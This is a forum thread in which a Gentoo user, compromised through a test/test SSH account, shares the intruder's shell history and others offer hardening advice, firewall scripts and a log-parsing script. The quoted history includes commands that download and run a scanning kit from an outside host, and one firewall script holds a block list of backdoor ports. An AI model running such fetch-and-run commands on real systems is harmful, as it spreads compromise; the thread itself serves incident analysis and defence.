# i got hacked. what were they up to?

## bcore

Ok, so I seem to have been hacked. I run a gentoo box as my home machine, but to be honest, I don't take nearly as good care of it as I should.. I'm sure I got what I deserved.  :Smile: 

Here's what I found out. The other day, I noticed a failed SSH login on my little syslog scroller to the user named "test". I completely forgot that such a user existed, but thinking about it, I'm pretty sure that when I first installed gentoo on this machine 3 years ago, I made an account with the username AND password of "test", and I guess I forgot to delete it. Now you see why I say I got what I deserved. I decided that I should delete the account, and when I went to delete its home directory, I noticed that a directory named "1" had been created. Inside that directory was a directory called "lib", and in the lib directory was a program I had never seen before. Here's the ls output:

```
total 893
-rw-r--r--  1 1013 users 166154 Aug  7 02:10 Born2Kill.seen
-rw-------  1 1013 users  17982 Oct  9  2000 COPYING
-rw-r--r--  1 1013 users 122242 Aug  7 02:12 LinkEvents
-rw-------  1 1013 users   2147 Oct  9  2000 Makefile
-rw-------  1 1013 users   3398 Nov  8  2000 README
-rw-------  1 1013 users   1569 Oct  9  2000 TODO
-rw-------  1 1013 users  25722 Nov  8  2000 VERSIONS
-rwx------  1 1013 users    936 Dec 21  2003 checkmech
-rwx------  1 1013 users  20290 Oct  9  2000 configure
-rwx------  1 1013 users 474228 Sep 29  2001 crond
-rw-r--r--  1 1013 users    111 Aug  7 02:00 emech.users
-rw-r--r--  1 1013 users     76 May 27  2003 knopki.seen
-rw-------  1 1013 users  22935 Oct  9  2000 mech.help
-rw-r--r--  1 1013 users   1085 Aug  7 02:00 mech.levels
-rw-------  1 1013 users      6 Aug  3 19:49 mech.pid
-rw-r--r--  1 1013 users    484 Aug  7 02:00 mech.session
-rw-------  1 1013 users   4842 Jul 28 02:29 mech.set
-rw-r--r--  1 1013 users   4862 Jul 28 02:33 mech.setes
drwx------  2 1013 users    304 Nov  8  2000 randfiles
drwx------  2 1013 users   1184 Sep 29  2001 src
```

I opened the user's .bash_history, and here's what I found:

```
w
ls
dir
cd\
hash
cd /bin/ls
ls
mkdir 1
ls
cd 1
passwd
passwd
passwd
ls
w
uname -a
cd /var
ls
cd mail
ls
test
./tets
./test
wget
cd
ls
rm -rf 1
ls
cd /sbin
ls
mkdir 1
wget
wget born2kill.100free.com/run.tar
cd
mkdir 1
cd 1
wget born2kill.100free.com/run.tar
ls
tar xzvf run.tar
tar xvf run.tar
ls
cd run
ls
./sc 168 32773 25 150
uptime
```

The creation date of the "1" and "lib" directory is august 3rd, so this happened recently. My question is whether anyone knows what this person was up to? The part I wonder in particular about is the line "./sc <a bunch of numbers>". I went to the URL where they downloaded the program, but it is no longer working. chkrootkit doesn't find anything.

I'm not too worried about having been hacked, as I was planning on replacing my hard drive within a week or two and starting fresh anyways. This time I'll be more careful, obviously.  :Smile: 

mod edit: Sticky

amne

edit2: 2006-04-10 unstuck

amne

----------

## jjasghar

that is interesting...

moral of that story, don't have a username called "test"   :Wink:   :Razz: 

----------

## bcore

Hmm, more web searching seems to reveal that they were attempting (and failing) to install and run an IRC bot. Since I have never gotten into IRC, I have no idea what that is, although I've heard the term many times.  :Smile: 

----------

## sirber

You can surely get his IP and contact his ISP about hacking attempt.

----------

## tomchuk

The source IP of the attack is just another compromised box, with either guest/guest, test/test, admin/admin, root/root username/password combos running sshd. I've been getting so many of these attempts that I've stopped reporting these compromised boxes. There have been a huge amount of scans using this new tool since the end of July and there are probably tens of thousands of compromised boxes out there.

The attacker's usual course of events is to login from a compromised box, change the password, download this little "run.tar" kit, maybe run an irc bot, and then set the scanning tool to scan an entire class A. Many times he'll also run a trojaned sshd.  He'll usually show up later to collect the results and/or use your box to infiltrate others. The scary part is that whoever is behind this hasn't done anything with these compromised boxen yet, they just seem to be cataloging the results of the scans.

----------

## brettlpb

Sorry to de-rail, but what log are you scrolling to see failed ssh logins etc?

----------

## bcore

/var/log/messages with some serious grep action.

----------

## Captain_Loser

Wow, I just looked through my logs and found a whole lot of failed ssh logins, and what I guess are rootkit attempts.. I am very surprised to see this many cracking attempts aimed at me. I am running a very safe system, but it makes you think.. I am sure glad gentoo has things like emerge -u.

----------

## Determined

Do you ssh this box from the internet? I hope there is a good reason to have open ports like that.

The moral of the story really: Strong passwords, hardware firewall, encrypt all network traffic possible.

----------

## bcore

Yeah, I'm SSH'ed in from work most days.. Easiest way to check my email and transfer files between.

I'd say the moral of the story here is don't create a test account, and if you do, don't also make its password "test", and if you do that too, don't forget to delete it.  :Smile: 

----------

## tumbak

I noticed a directory called src/ in your output, can you tar it and share it please, or tar the whole ~test   :Very Happy: 

----------

## JudgeNik

 :Mad:  damn.

I've seen a folder called /1/ on my server.

I've been told to emerge chkrootkit.

apparently i've been rooted...

Don't know how my server was setup beginning of last year and it never had any testing accounts on it and no accounts with same/same.

----------

## drspewfy

of course you have been rooted!!!!

and he installed a Psybnc kinda bot. He uses YOUR ip to connect to the IRC and like that talk with others using your ip, if somebody tries to attack him he won't get down cuz he's spoofing your IP.. and you will get down  :Razz: 

You should use

"lsof" instead of netstat, ps x, etc...

Cuz maybe you have been backdoored..

use the command "find" to see what files had been modified on that day,

also try to use tripwire, to see what files changed since the intrusion (well that is for the next penetrations  :Wink: ), besides snort.

good luck!

----------

## bcore

I'm certainly willing to tar up the directory for anyone who is curious. I have no way of hosting it though...

----------

## evoweiss

Hi all,

Over the past few weeks I've noticed a similar pattern of hack attempts against my box (ssh'ing in and attempting to log in with things like "test", "NOUSER", and "root"). I keep everything up-to-date and, hence, haven't noticed anything amiss. Just a quick tip: There's no need to dig through the log file of everything, just look into the /var/log/sshd/ files to get an indication of that port's activity.

Another thing I did was invest in a hardware firewall (Zywall 1 model) which will send me an email whenever there are any events whether legitimate (me ssh'ing into my system from work) or illegitimate (attacks on my system, other attempt to gain access via ssh). I highly recommend the same to others.

Finally, I always use strong passwords and keep my system updated. I suspect I'm pretty safe  :Smile: .

Best,

Alex

----------

## jpc82

Wow I am glad I saw this post.

I was just looking at my logs and I see this

```
Aug 13 20:09:28 [sshd] Illegal user test from 194.78.243.110
Aug 13 20:09:29 [sshd] reverse mapping checking getaddrinfo for dialup686.gent.skynet.be failed - POSSIBLE BREAKIN ATTEMPT!
Aug 13 20:09:29 [sshd] error: Could not get shadow information for NOUSER
Aug 13 20:09:29 [sshd] Failed password for illegal user test from 194.78.243.110 port 3579 ssh2
Aug 13 20:09:31 [sshd] User guest not allowed because shell /dev/null is not executable
Aug 13 20:09:42 [sshd] Failed password for root from 194.78.243.110 port 4229 ssh2
```

Does this mean that all their attempts were not successful?  I have good passwords, and I run glsa-check every week to verify my system.

Also there is the line "Failed password for root".  I'm confused since I have ssh set to not allow root access, or is this just the regular error for failed root access?

Also, would moving ssh to another port stop these attacks?  I'm assuming it would since they would be trying to connect to the wrong port?

----------

## grant.mcdorman

 *bcore wrote:*   

> Yeah, I'm SSH'ed in from work most days.. Easiest way to check my email and transfer files between.
> 
> I'd say the moral of the story here is don't create a test account, and if you do, don't also make it's password "test", and if you do that too, don't forget to delete it. 

 I ssh in from work too, but I've set up the firewall so the ssh port is only open to my work IP - connection attempts from any other IP are dropped. If your work IP is a fixed address, and your firewall supports it (Linux of course does, and some router boxes, e.g. SMC's, do too), you could do this too to get better security. Makes it kinda hard for the 31337 sk1rpt kiddies to try to break in that way.

----------

## bcore

Unfortunately I don't get a static IP from work, but I'm thinking I'm gonna set sshd up to only allow key logins, since I use keychain from work. I've already also got it set up to disallow root logins, so I figure I should be reasonably safe...

----------

## smonijhay1

geez, what an awesome post!

thought I should give my info a look since I saw this post and sure enough there were numerous attempts at trying to connect using random user names.

now I must learn to set up and configure a good firewall (ipchains?  iptables?)

----------

## bcore

One other thing I have to remark is that looking at the bash_history really shows how inept this person was.. Total script kiddie. I mean cummon.. "cd\"??!  The lame failed attempt to read my mail, then install something in "/sbin"?

I definitely don't think I was up against anyone with skill, so if I had been properly prepared I would have had nothing to worry about..

----------

## tomchuk

 *bcore wrote:*   

> I definitely don't think I was up against anyone with skill.

 

Well he definitely wasn't up against anyone with skill  :Razz:  Come on, three years with a test user with test as a password - you're in no place to critique anyone's typos  :Smile: 

----------

## bcore

Re-read my posts. I fully admitted that I made a mistake, and I said that if I had done my due diligence, I would have been fine.

----------

## tomchuk

I know, it was a joke, notice the 'Razz' and 'Smile' smileys.

----------

## GentooBox

I hate ssh worms...

They will never stop.. just like any other worm.

----------

## Ox53746F6E65

use portknocking to make your system more secure.

----------

## bcore

 *tomchuk wrote:*   

> I know, it was a joke, notice the 'Razz' and 'Smile' smileys.

 

Argh, sorry, stressful day.  :Smile: 

----------

## Captain_Loser

 *bcore wrote:*   

> I'm certainly willing to tar up the directory for anyone who is curious. I have no way of hosting it though...

 

I don't mind hosting. However I will remove something required for the program to operate, just so that I won't be hosting something evil. PM, or e-mail me if you're interested.

----------

## evoweiss

Hi All,

This is definitely becoming an interesting thread and I've got a bit more to contribute after an interesting email today.

I received an email that was purportedly from zywall and asked me to fill out a 'customer survey'. It smelled like BS to me, and using the wonderful pine email client, I quickly saw that it was. 

I would have been redirected to some website that, undoubtedly, would have fscked around with some aspect of my set-up.

Unfortunately, I managed to accidentally delete the email. Did anybody else receive something similar and how did they know I use a zywall router/firewall (lucky guess?).

Also, I noticed a post that mentioned port knocking. I've heard of this before, but am not sure what it is nor how to set it up. Care to explain it to me and point me to any useful how-tos in the event that I'm interested?

If I receive another email like it (and I probably will), I'll be sure to save it this time and even do a wget on the url I'm directed to, post the html code, etc.

Best,

Alex

----------

## bcore

 *Captain_Loser wrote:*   

> I don't mind hosting. 

 

How could I turn that down. We have very similar signatures.  :Smile:  I'll email it to you tomorrow..

----------

## Paulten

So you got a test user without a password right? Does ssh permit users with empty password? It should not, I have `PermitEmptyPasswords no` in my sshd_config, I don't know if I put it there myself or if this is default behavior. 

Did you have username: test and passwd: test maybe ? :p

Later

----------

## JudgeNik

As he previously stated in the first post:

 *Quote:*   

> ...I made an account with the username AND password of "test"...

 

----------

## Paulten

 *JudgeNik wrote:*   

> As he previously stated in the first post:
> 
>  *Quote:*   ...I made an account with the username AND password of "test"... 

 

soorrry  :Razz: 

----------

## devon

 *evoweiss wrote:*   

> Also, I noticed a post that mentioned port knocking. I've heard of this before, but am not sure what it is nor how to set it up. Care to explain it to me and point me to any useful how-tos in the event that I'm interested?

 

Google for port knocking.  :Smile: 

----------

## Captain_Loser

I noticed that I was getting about 5 of these crack attempts a day, so I set up a simple firewall to see if I could try to keep some of this stuff away.  I made a script that uses iptables with anti portscan and anti os-fingerprinting stuff in it. I know that it is impossible to stop all port scans and all os fingerprinting attempts, but I can try. Now that I run this firewall I haven't gotten any of these crack attempts against my machine.  The attempts on my machine had been going on for about a month, and now they have stopped.  I am putting this script on other linux boxes that are getting hit to see if this stops the attempts on them as well.

----------

## silentbob

 *Captain_Loser wrote:*   

> ...  I made a script that uses iptables with anti portscan and anti os-fingerprinting stuff in it.

 

Care to share with us, or is it (a) already available or (b) security risk?

----------

## OdinsDream

Could someone help me figure out where my /var/log/sshd information is?

I have other entries in /var/log/, but I have no ssh-related files or directories. ps shows:

 /usr/sbin/syslogd -m 0

...running. Do I need to specifically enable sshd logging somewhere? Many thanks, great thread!

----------

## Captain_Loser

 *silentbob wrote:*   

>  *Captain_Loser wrote:*   ...  I made a script that uses iptables with anti portscan and anti os-fingerprinting stuff in it. 
> 
> Care to share with us, or is it (a) already available or (b) security risk?

 

Don't mind sharing it.  It's not as secure as it could be though.  I am putting this firewall on several machines that have different access needs, so instead of blocking everything and opening up the necessary ports, I just blocked certain types of traffic. I also didn't add logging support, but logging isn't too difficult to add. The bad flags section, and the os fingerprinting section are what seems to have done the trick. Here it is.

```
#!/bin/bash

#Define the location of the IPTABLES executable
IPTABLES=/sbin/iptables

#Interfaces
#These are only needed for Forwarding
EXTIF=eth0 #External Interface
INTIF=eth1 #Internal Interface

#Lets be friendly
echo "Loading Firewall Ruleset"

###########################################################################
#INSMOD section, only uncomment if you get errors
# or know that you don't have the following modules
# built into the kernel
###########################################################################
#echo "Loading Modules"
#/sbin/modprobe ip_tables
#/sbin/modprobe iptable_filter
#/sbin/modprobe ip_conntrack

##########################################################################
#Clear out all current chains and restore defaults
##########################################################################
$IPTABLES -F
$IPTABLES -F -t mangle
$IPTABLES -F -t nat
$IPTABLES -X
$IPTABLES -X -t mangle
$IPTABLES -X -t nat

#Set Defaults to ACCEPT
$IPTABLES -P INPUT ACCEPT
$IPTABLES -P OUTPUT ACCEPT
$IPTABLES -P FORWARD ACCEPT

############################################################################
#Define User Chains
#There should be no need to edit this section
#Make all changes after this section
############################################################################

#SYN flood protection
$IPTABLES -N SYN-FLOOD
$IPTABLES -A SYN-FLOOD -p tcp --syn -m limit --limit 1/s --limit-burst 4 -j ACCEPT
$IPTABLES -A SYN-FLOOD -p tcp --syn -j DROP
$IPTABLES -A SYN-FLOOD -p tcp ! --syn -j ACCEPT

#Ping of Death Protection
$IPTABLES -N POD
$IPTABLES -A POD -p icmp --icmp-type echo-request -m limit --limit 1/s -j ACCEPT
#Echo requests over the limit must be dropped here, otherwise they fall
#back to the calling chain and the ACCEPT policy lets them through
$IPTABLES -A POD -p icmp --icmp-type echo-request -j DROP

#Bad Flags section
$IPTABLES -N BF
$IPTABLES -A BF -p tcp --tcp-flags ALL NONE -j DROP #NULL scan
$IPTABLES -A BF -p tcp --tcp-flags ALL ALL -j DROP #XMAS scan
$IPTABLES -A BF -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP #NMAP
$IPTABLES -A BF -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP #NMAP
$IPTABLES -A BF -p tcp --tcp-flags SYN,RST SYN,RST -j DROP #SYN-RST scan
$IPTABLES -A BF -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP #SYN-FIN scan

#OS Fingerprinting
$IPTABLES -N OSF
$IPTABLES -A OSF -p tcp --dport 0 -j DROP #Block port 0
$IPTABLES -A OSF -p udp --dport 0 -j DROP #Block port 0
$IPTABLES -A OSF -p tcp --sport 0 -j DROP #Block port 0
$IPTABLES -A OSF -p udp --sport 0 -j DROP #Block port 0
$IPTABLES -A OSF -p icmp --icmp-type address-mask-request -j DROP #Block ICMP-Address-Mask
$IPTABLES -A OSF -p icmp --icmp-type address-mask-reply -j DROP #Block ICMP-Address-Mask

#Various Virii and Backdoors
$IPTABLES -N BD
$IPTABLES -A BD -p tcp --dport 6670 -j DROP #Deepthroat
$IPTABLES -A BD -p tcp --dport 1243 -j DROP #Subseven
$IPTABLES -A BD -p udp --dport 1243 -j DROP #Subseven
$IPTABLES -A BD -p tcp --dport 27374 -j DROP #Subseven
$IPTABLES -A BD -p udp --dport 27374 -j DROP #Subseven
$IPTABLES -A BD -p tcp --dport 6711:6713 -j DROP #Subseven
$IPTABLES -A BD -p tcp --dport 12345:12346 -j DROP #Netbus
$IPTABLES -A BD -p tcp --dport 20034 -j DROP #Netbus
$IPTABLES -A BD -p udp --dport 31337:31338 -j DROP #Back Orifice
$IPTABLES -A BD -p udp --dport 28431 -j DROP #Hack-a-Tack-2000

#SMB Traffic (wind0ws file sharing)
$IPTABLES -N SMB
$IPTABLES -A SMB -p tcp --dport 137 -j DROP
$IPTABLES -A SMB -p udp --dport 137 -j DROP
$IPTABLES -A SMB -p tcp --sport 137 -j DROP
$IPTABLES -A SMB -p udp --sport 137 -j DROP
$IPTABLES -A SMB -p tcp --dport 138 -j DROP
$IPTABLES -A SMB -p udp --dport 138 -j DROP
$IPTABLES -A SMB -p tcp --sport 138 -j DROP
$IPTABLES -A SMB -p udp --sport 138 -j DROP
$IPTABLES -A SMB -p tcp --dport 139 -j DROP
$IPTABLES -A SMB -p udp --dport 139 -j DROP
$IPTABLES -A SMB -p tcp --sport 139 -j DROP
$IPTABLES -A SMB -p udp --sport 139 -j DROP
$IPTABLES -A SMB -p tcp --dport 445 -j DROP
$IPTABLES -A SMB -p udp --dport 445 -j DROP
$IPTABLES -A SMB -p tcp --sport 445 -j DROP
$IPTABLES -A SMB -p udp --sport 445 -j DROP

#Forwarding support
$IPTABLES -N PASS
$IPTABLES -A PASS -i $EXTIF -o $INTIF -m state --state ESTABLISHED,RELATED -j ACCEPT
$IPTABLES -A PASS -i $INTIF -o $EXTIF -j ACCEPT
$IPTABLES -A PASS -j LOG

############################################################################
#Add user chains to system chains
#This section should be edited to your needs.
#Comment or uncomment sections as needed
############################################################################

#Enable NAT Forwarding between EXTIF and INTIF
#Make sure to enable forwarding in sysctl section below
#$IPTABLES -A FORWARD -j PASS
#$IPTABLES -t nat -A POSTROUTING -o $EXTIF -j MASQUERADE

#Drop invalid Packets
$IPTABLES -A INPUT -m state --state INVALID -j DROP
$IPTABLES -A FORWARD -m state --state INVALID -j DROP

#SYN Flood Protection
$IPTABLES -A INPUT -j SYN-FLOOD
$IPTABLES -A FORWARD -j SYN-FLOOD

#Block Ping of Death
$IPTABLES -A INPUT -j POD
$IPTABLES -A FORWARD -j POD

#Drop Bad Flags (port scans)
$IPTABLES -A INPUT -j BF
$IPTABLES -A FORWARD -j BF

#Block OS Fingerprinting (Doesn't always work)
$IPTABLES -A INPUT -j OSF
$IPTABLES -A FORWARD -j OSF

#Block Virii and Backdoors
$IPTABLES -A INPUT -j BD
$IPTABLES -A FORWARD -j BD

#Block SMB Traffic (windo0s file sharing)
#Only blocks the traffic from getting in/out of the LAN
$IPTABLES -A INPUT -j SMB
$IPTABLES -A FORWARD -j SMB

#sys-ctl variables, edit to your needs

#Enable IP Forwarding
#echo "1" > /proc/sys/net/ipv4/ip_forward

#Dynamic Addressing (useful for forwarding)
echo "1" > /proc/sys/net/ipv4/ip_dynaddr

#Disable IP Spoofing
echo "2" > /proc/sys/net/ipv4/conf/all/rp_filter

#Don't respond to Pings
#echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all

#Don't respond to ICMP Broadcast (smurf attacks)
echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts

#Bad ICMP message protection
echo "1" > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses

#Disable source routed packets. (Keeps people from looking in through the NAT)
echo "0" > /proc/sys/net/ipv4/conf/all/accept_source_route

#Disable Redirects (Redirects can be used to mess up routing tables, aka spyware)
echo "0" > /proc/sys/net/ipv4/conf/all/accept_redirects

#Enable log_martians (logs bad traffic)
echo "1" > /proc/sys/net/ipv4/conf/all/log_martians

#Enable SYN-Cookies (not necessary in some kernels)
#echo "1" > /proc/sys/net/ipv4/tcp_syncookies

#Continue being friendly
echo "Done"
```

----------

## Yoda_Oz

you dudes are really smart. how did you get to know all that stuff? i would not have the first idea of anything yous are talking about!

im in total awe!

----------

## Mben

after reading this thread i took a look at my logs and found that i too had been probed. is there any way to report this? that part of my log is below:

```
Aug  2 18:46:57 localhost sshd[5288]: Failed password for illegal user test from ::ffff:64.246.32.92 port 46390 ssh2
Aug  2 18:46:57 localhost sshd[5290]: User guest not allowed because shell /dev/null is not executable
Aug  2 18:46:58 localhost sshd[5290]: error: Could not get shadow information for NOUSER
Aug  2 18:46:58 localhost sshd[5290]: Failed password for illegal user guest from ::ffff:64.246.32.92 port 46484 ssh2
Aug  2 18:46:58 localhost sshd[5293]: Illegal user admin from ::ffff:64.246.32.92
Aug  2 18:46:59 localhost sshd[5293]: error: Could not get shadow information for NOUSER
Aug  2 18:46:59 localhost sshd[5293]: Failed password for illegal user admin from ::ffff:64.246.32.92 port 46553 ssh2
Aug  2 18:46:59 localhost sshd[5295]: Illegal user admin from ::ffff:64.246.32.92
Aug  2 18:47:00 localhost sshd[5295]: error: Could not get shadow information for NOUSER
Aug  2 18:47:00 localhost sshd[5295]: Failed password for illegal user admin from ::ffff:64.246.32.92 port 46612 ssh2
Aug  2 18:47:01 localhost sshd[5297]: Illegal user user from ::ffff:64.246.32.92
Aug  2 18:47:01 localhost sshd[5297]: error: Could not get shadow information for NOUSER
Aug  2 18:47:01 localhost sshd[5297]: Failed password for illegal user user from ::ffff:64.246.32.92 port 46692 ssh2
Aug  2 18:47:03 localhost sshd[5299]: Failed password for root from ::ffff:64.246.32.92 port 46769 ssh2
Aug  2 18:47:04 localhost sshd[5301]: Failed password for root from ::ffff:64.246.32.92 port 46842 ssh2
Aug  2 18:47:05 localhost sshd[5303]: Failed password for root from ::ffff:64.246.32.92 port 46929 ssh2
Aug  2 18:47:05 localhost sshd[5305]: Illegal user test from ::ffff:64.246.32.92
Aug  2 18:47:05 localhost sshd[5305]: error: Could not get shadow information for NOUSER
Aug  2 18:47:05 localhost sshd[5305]: Failed password for illegal user test from ::ffff:64.246.32.92 port 46992 ssh2
```

----------
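The "serious grep action" bcore mentions, and the sshd lines jpc82 and Mben posted, can be turned into a small summariser that groups attempts per source address and, more importantly, tells a run of failures apart from an actual successful login. The script below is an added example, not code from anyone in this thread; its sample log is constructed to mirror the two formats quoted above (metalog `[sshd]` and syslog `sshd[pid]:`), plus one constructed `Accepted` line, and the `PROBE_USERS` list is an assumption taken from tomchuk's description of the scanner.

```python
import re

# Stock account names the scanning tool described in this thread tries
# (guest, test, admin, user, root). Two or more from one source is its signature.
PROBE_USERS = {"test", "guest", "admin", "user", "root"}

# Matches both the metalog "[sshd]" and syslog "sshd[pid]:" formats quoted above:
#   "Failed password for illegal user test from 194.78.243.110 port 3579 ssh2"
#   "Failed password for root from ::ffff:64.246.32.92 port 46769 ssh2"
#   "Accepted password for test from 10.0.0.7 port 51234 ssh2"
AUTH_RE = re.compile(
    r"(?P<result>Accepted|Failed) \w+ for (?:illegal user |invalid user )?"
    r"(?P<user>\S+) from\s+(?:::ffff:)?(?P<ip>[0-9a-fA-F:.]+) port \d+"
)
# "Illegal user admin from ::ffff:64.246.32.92" carries no port field.
ILLEGAL_RE = re.compile(
    r"Illegal user (?P<user>\S+) from\s+(?:::ffff:)?(?P<ip>[0-9a-fA-F:.]+)"
)


def parse_line(line):
    """Return (result, user, ip) for an sshd auth event, or None for other lines.

    result is "Failed", "Accepted" or "Illegal". The IPv4-mapped "::ffff:" prefix
    that sshd logs on dual-stack sockets is stripped so both forms group together.
    """
    m = AUTH_RE.search(line)
    if m:
        return m.group("result"), m.group("user"), m.group("ip")
    m = ILLEGAL_RE.search(line)
    if m:
        return "Illegal", m.group("user"), m.group("ip")
    return None


def summarise(lines):
    """Group auth events per source address.

    Returns {ip: {"failed": int, "accepted": [users], "users": set, "probe_pattern": bool}}.
    "Illegal user" lines only add the username: sshd also logs a "Failed password"
    line for the same attempt, so counting both would double the failure count.
    """
    per_ip = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        result, user, ip = parsed
        entry = per_ip.setdefault(ip, {"failed": 0, "accepted": [], "users": set()})
        entry["users"].add(user)
        if result == "Failed":
            entry["failed"] += 1
        elif result == "Accepted":
            entry["accepted"].append(user)
    for entry in per_ip.values():
        entry["probe_pattern"] = len(entry["users"] & PROBE_USERS) >= 2
    return per_ip


def report(lines):
    """One line per source: sources with a successful login first, then by failures."""
    out = []
    ranked = sorted(summarise(lines).items(),
                    key=lambda kv: (not kv[1]["accepted"], -kv[1]["failed"]))
    for ip, e in ranked:
        if e["accepted"]:
            flag = "SUCCESSFUL LOGIN as " + ",".join(e["accepted"])
        elif e["probe_pattern"]:
            flag = "default-account scan"
        else:
            flag = "failed logins"
        out.append(f"{ip}: {e['failed']} failed, users={sorted(e['users'])} [{flag}]")
    return out


# Constructed sample: lines in the shapes quoted by jpc82 and Mben above, plus one
# constructed "Accepted" line showing what a test/test login would have looked like.
SAMPLE_LOG = """\
Aug 13 20:09:28 [sshd] Illegal user test from 194.78.243.110
Aug 13 20:09:29 [sshd] reverse mapping checking getaddrinfo for dialup686.gent.skynet.be failed - POSSIBLE BREAKIN ATTEMPT!
Aug 13 20:09:29 [sshd] error: Could not get shadow information for NOUSER
Aug 13 20:09:29 [sshd] Failed password for illegal user test from 194.78.243.110 port 3579 ssh2
Aug 13 20:09:31 [sshd] User guest not allowed because shell /dev/null is not executable
Aug 13 20:09:42 [sshd] Failed password for root from 194.78.243.110 port 4229 ssh2
Aug  2 18:46:57 localhost sshd[5288]: Failed password for illegal user test from ::ffff:64.246.32.92 port 46390 ssh2
Aug  2 18:46:58 localhost sshd[5293]: Illegal user admin from ::ffff:64.246.32.92
Aug  2 18:46:59 localhost sshd[5293]: Failed password for illegal user admin from ::ffff:64.246.32.92 port 46553 ssh2
Aug  2 18:47:03 localhost sshd[5299]: Failed password for root from ::ffff:64.246.32.92 port 46769 ssh2
Aug  2 18:47:05 localhost sshd[5305]: Failed password for illegal user test from ::ffff:64.246.32.92 port 46992 ssh2
Aug  2 18:47:06 localhost sshd[5307]: Failed password for illegal user guest from ::ffff:64.246.32.92 port 47010 ssh2
Aug  3 19:40:12 localhost sshd[5411]: Accepted password for test from 10.0.0.7 port 51234 ssh2
"""

if __name__ == "__main__":
    for line in report(SAMPLE_LOG.splitlines()):
        print(line)
```

Feed it `grep sshd /var/log/messages` instead of `SAMPLE_LOG` on a real box; an `Accepted` line from a source that also shows the default-account pattern is the case that deserves a closer look at that account's home directory.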

## silentbob

```
$ grep -i "failed password" /var/log/messages
Aug  2 23:29:23 <myhost> sshd[2236]: Failed password for illegal user test from 220.69.12.96 port 57967 ssh2
Aug  2 23:29:26 <myhost> sshd[2238]: Failed password for illegal user guest from 220.69.12.96 port 58007 ssh2
```

```
$ grep -i "user guest" /var/log/messages
Aug  2 23:29:26 <myhost> sshd[2238]: User guest not allowed because shell /dev/null is not executable
```

Me too until I've locked down my iptables config. Now I have restricted the SSH port (22) to only the 2 IP addresses that I will connect from.

----------

## revertex

hi guys!

this thread is really interesting to open my eyes about security.

looking in these forums you can find nice tips on how to make your boxes a little more safe.

- port knocking hides your ports from regular port scanners, only revealing them when a special portscan sequence is sent.
- keychain, you need to bring your key with you, not so handy, do not use on untrusted machines. (look at the ibm developerworks drobbins article)
- skey, the one-way password, just works one time, perfect for login from untrusted machines.
- edit your sshd_config, disallow passwordless logins, root logins, and if possible allow login only for one user or group.
- if you ssh from work/school that doesn't have a static ip, create a dynamic dns account (no-ip, dyndns) for your office box and only allow logins from that address, like "myoffice.homeip.net", "me_at_school.homeip.net"
- use a nice root tail to watch what's happening closely
- install something like chkrootkit, integrit, snort, configure once and run forever, no excuses.

----------

## silentbob

 *revertex wrote:*   

> -edit your sshd_config, disallow passwordless logins, root logins, and if possible allow login only for one user or group.

 

Just to clarify for anyone else who reads the filename too quickly, you need to edit the /etc/ssh/sshd_config file as stated (and not /etc/ssh/ssh_config like I have just spent the past few minutes playing with, and getting strange ssh, client, errors!)

[edit: /etc/ssh/sshd_config - d'oh]

Last edited by silentbob on Wed Aug 18, 2004 7:08 am; edited 1 time in total

----------

## zerojay

 *silentbob wrote:*   

>  *revertex wrote:*   -edit your sshd_config, disallow passwordless logins, root logins, and if possible allow login only for one user or group. 
> 
> Just to clarify for anyone else who reads the filename too quickly, you need to edit the /etc/sshd_config file as stated (and not /etc/ssh_config like I have just spent the past few minutes playing with, and getting strange ssh, client, errors!)

 

/etc/ssh/sshd_config

----------

## Goodle

I think it would be interesting to set up a honeypot for this lame attack.  It looks like the people that are trying this have no idea what they are doing... It would be fun to screw around with them. Of course this would take time to set up a honeypot... SELinux Joy!

----------

## skyfolly

would it be more secure without SSH installed?

Damn it, I have to install iptables and chrootkit tonight right away.

----------

## Goodle

 *Quote:*   

> would it be more secure without SSH installed?
> 
> Damn it, I have to install iptables and chrootkit tonight right away.

 

There is no security vulnerability here... Only if you are retarded and have a user named test with the password test.  Don't go through the trouble, unless...

----------

## Jeremy_Z

I may be going to write a port knocking client / server in Perl, if some are interested i will post it.

My main concern is to secure my parent's gentoo routing box, currently it has all ports stealth (except some p2p ports) and i want to write something to knock the ssh port from my home.

----------

## skyfolly

shorewall looks good enough for me, quite nice documentation too. I am reading it.

----------

## Paulten

I have a small iptables script which I think works very well. 

And another sshd_config tip is to "PermitRootLogin no".

And while we are on the subject I recommend using ssh pubkeys. 

I use ssh-keygen and generate a key and upload it to the server as I described in this article http://paul.kde.no/modules/articles/article.php?id=5

and btw I got a tip that I should use DSA instead of rsa as I wrote in that article, I'll change it when I get some spare time. 

Alternative, net-misc/keychain is worth looking into.

I also use /etc/hosts.allow to permit ssh access only to the IP's listed. 

Create the file /etc/hosts.allow and add : 

```
sshd : localhost : allow
sshd : someip : allow
sshd : workip : allow
sshd : ALL : deny
```

From debian's hosts.allow : 

```
# /etc/hosts.allow: list of hosts that are allowed to access the system.
#                   See the manual pages hosts_access(5), hosts_options(5)
#                   and /usr/doc/netbase/portmapper.txt.gz
#
# Example:    ALL: LOCAL @some_netgroup
#             ALL: .foobar.edu EXCEPT terminalserver.foobar.edu
#
# If you're going to protect the portmapper use the name "portmap" for the
# daemon name. Remember that you can only use the keyword "ALL" and IP
# addresses (NOT host or domain names) for the portmapper. See portmap(8)
# and /usr/doc/portmap/portmapper.txt.gz for further information.
```

My iptables script : 

```
# eth0 = local (LAN) side, eth1 = internet side
echo 1 > /proc/sys/net/ipv4/ip_forward
/sbin/iptables -F
/sbin/iptables -X
/sbin/iptables -t nat -F
/sbin/iptables -N FILTER
/sbin/iptables -N LOKAL
/sbin/iptables -P INPUT DROP
#/sbin/iptables -A INPUT -p udp -i eth0 -s 192.168.0.0/24 -j QUEUE
# Packets arriving on the internet side go through FILTER; everything else
# (LAN, loopback) goes through LOKAL, which accepts it all
/sbin/iptables -A INPUT -i eth1 -j FILTER
/sbin/iptables -A INPUT ! -i eth1 -j LOKAL
/sbin/iptables -A FILTER -m state --state ESTABLISHED,RELATED -j ACCEPT
# (never matches: FILTER only sees eth1 traffic, lo is handled by LOKAL above)
/sbin/iptables -A FILTER -i lo -m state --state NEW -j ACCEPT
/sbin/iptables -A FILTER -p tcp --dport 80 -j ACCEPT
